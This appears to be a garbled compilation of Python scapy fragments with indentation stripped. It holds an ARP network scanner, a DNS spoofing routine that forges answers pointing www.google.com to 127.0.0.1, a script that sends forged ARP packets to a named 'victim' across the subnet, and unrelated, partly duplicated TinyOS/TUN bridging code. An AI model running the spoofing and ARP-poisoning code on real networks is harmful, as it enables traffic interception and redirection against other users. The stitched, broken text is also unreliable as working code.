def scan(ip):
arp_request = scapy.ARP(pdst = ip)
broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout = 1, verbose = False)[0]
clients_list = []
for element in answered_list:
client_dict = {'ip':element[1].psrc, 'mac':element[1].hwsrc}
clients_list.append(client_dict)
return clients_list
def procPacket(p):
#Lets grab the source mac and dst mac
eth_layer = p.getlayer(scapy.Ether)
src_mac = eth_layer.src
dst_mac = eth_layer.dst
#Now on to grabbing the src IP and dst IP
ip_layer = p.getlayer(scapy.IP)
src_ip = ip_layer.src
dst_ip = ip_layer.dst
#Woot..UDP Layer
udp_layer = p.getlayer(scapy.UDP)
src_port = udp_layer.sport
dst_port = udp_layer.dport
#And finally..the DNS layer
dns_layer = p.getlayer(scapy.DNS)
d = scapy.DNS()
d.id = dns_layer.id #Transaction ID
d.qr = 1 #1 for Response
d.opcode = 16
d.aa = 0
d.tc = 0
d.rd = 0
d.ra = 1
d.z = 8
d.rcode = 0
d.qdcount = 1 #Question Count
d.ancount = 1 #Answer Count
d.nscount = 0 #No Name server info
d.arcount = 0 #No additional records
d.qd = str(dns_layer.qd)
d.an = scapy.DNSRR(rrname="www.google.com.",
ttl=330,
type="A",
rclass="IN",
rdata="127.0.0.1")
#Send the spoofed packet away!
#Don't forget to switch stuffs lawl
spoofed = scapy.Ether(src=dst_mac, dst=src_mac) / scapy.IP(
src=dst_ip, dst=src_ip) / scapy.UDP(sport=dst_port, dport=src_port) / d
#Off we go!
scapy.sendp(spoofed, iface_hint=src_ip)
def scan(ip): #1. who has target ip
arp_request = scapy.ARP(
pdst=ip
) # use scapy.ls(scapy.ARP) to find all the argument can set for scapy.ARP , print(arp_request.show())--> to see all the packet feild , summary():implemeted by scapy to print content of packet
broadcast = scapy.Ether(
dst="ff:ff:ff:ff:ff:ff"
) #2.set dest mac to broadcast MAC, to create ethernet object and store in broadcast with dest broadcast feild as ff:...:ff
arp_request_broadcast = broadcast / arp_request #in scapy broadcast is append with arp request new packet with combination of both, print(arp_request_broadcast.summary(),arp_request_broadcast.show() )
answered_list = scapy.srp(
arp_request_broadcast, timeout=1, verbose=False
)[0] #will send the packet and return value (couple of two values answered,unanswered) print(answered.summary())
#as it give 2 values we are telling it to give only element 0 by [0]
clients_list = []
for element in answered_list: #parse response
client_dict = {
"ip": element[1].psrc,
"mac": element[1].hwsrc
} #print(element1.show())
clients_list.append(client_dict)
return clients_list
def send_to_tos(self, payload):
#keeping statistics
self.read_count += 1
file_out.write("read from linux: " + str(self.read_count) + "\n")
file_out.write(str(map(lambda (x): hex(ord(x)), payload)))
file_out.flush()
b = scapy.Ether(payload)
try:
des = b.payload.dst #get the destiation address
src = b.payload.src #get the source address
#switching dest and source and they need to switch back in tinyos code
dest = int(src[src.rfind('.')+1:len(src)]) #get last octet of source address
src = int(des[des.rfind('.')+1:len(des)]) #get last octet of dest address
except:
#print b.show() #nice function showing extensive packet information
des = b.payload.pdst #get the destiation address
src = b.payload.psrc #get the source address
#switching dest and source and they need to switch back in tinyos code
dest = int(src[src.rfind('.')+1:len(src)]) #get last octet of source address
src = int(des[des.rfind('.')+1:len(des)]) #get last octet of dest address
if (src > 254):
src = 0xff
if (des.startswith(NET_ADDR)):
self.write_packet(dest, src,LINUX_GROUP_TYPE, payload)
#!/usr/bin/python
import scapy,sys
if not len(sys.argv) == 2:
print "Must supply IP"
sys.exit(1)
victim = sys.argv[1]
network = victim[:victim.rfind(".")+1] + "%d"
tmac = scapy.getmacbyip(victim)
for i in range(255):
target = str(network % i)
if target == victim:
continue
p = scapy.Ether(dst=tmac)/scapy.ARP(op="who-has", psrc=target, pdst=victim)
scapy.sendp(p, iface_hint=target)
def send_to_tos(self, payload):
#keeping statistics
self.read_count += 1
file_out.write("read from linux: " + str(self.read_count) + "\n")
file_out.write(str(map(lambda (x): hex(ord(x)), payload)))
file_out.flush()
b = scapy.Ether(payload)
try:
des = b.payload.dst #get the destiation address
src = b.payload.src #get the source address
#switching dest and source and they need to switch back in tinyos code
dest = int(src[src.rfind('.')+1:len(src)]) #get last octet of source address
src = int(des[des.rfind('.')+1:len(des)]) #get last octet of dest address
except:
#print b.show() #nice function showing extensive packet information
des = b.payload.pdst #get the destiation address
src = b.payload.psrc #get the source address
#switching dest and source and they need to switch back in tinyos code
dest = int(src[src.rfind('.')+1:len(src)]) #get last octet of source address
src = int(des[des.rfind('.')+1:len(des)]) #get last octet of dest address
if (src > 254):
src = 0xff
if (des.startswith(NET_ADDR)):
self.write_packet(dest, src,LINUX_GROUP_TYPE, payload)
#self.mif.sendMsg(self.tos_source, 0, 137, 0,t)
def write_packet(self, dest, src, type, payload):
msg = SerialPacket(None)
#using set_header info to set header contents
msg.set_header_dest(dest)
msg.set_header_src(src)
msg.set_header_group(type)
msg.set_header_type(type)
msg.set_header_length(len(payload)) #might need to be payload + header length
data = chr(Serial.TOS_SERIAL_ACTIVE_MESSAGE_ID) #it is a serial message
data += msg.dataGet()[0:msg.offset_data(0)] #header info
data += payload
self.tos_source.writePacket(data) #write that all
def main_loop(self):
counter = 0
while 1:
#now we need to get the payload from OS
#need to send to TOS 10*1024 is max length of the read
#although one should explicity set MTU to less than 248
payload = os.read(self.tun_fd, 10*1024)
#from_linux.write(str( map(lambda (x): hex(ord(x)), payload)))
if not payload:
break
self.send_to_tos(payload)
# /////////////////////////////////////////////////////////////////////////////
# main
# /////////////////////////////////////////////////////////////////////////////
def main():
# open the TUN/TAP interface
(tun_fd, tun_ifname) = open_tun_interface("/dev/net/tun")
r = gr.enable_realtime_scheduling()
if r == gr.RT_OK:
realtime = True
else:
realtime = False
print "Note: failed to enable realtime scheduling"
to_tos = os_read(tun_fd, verbose=True)
to_tos.main_loop() # don't expect this to return...
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass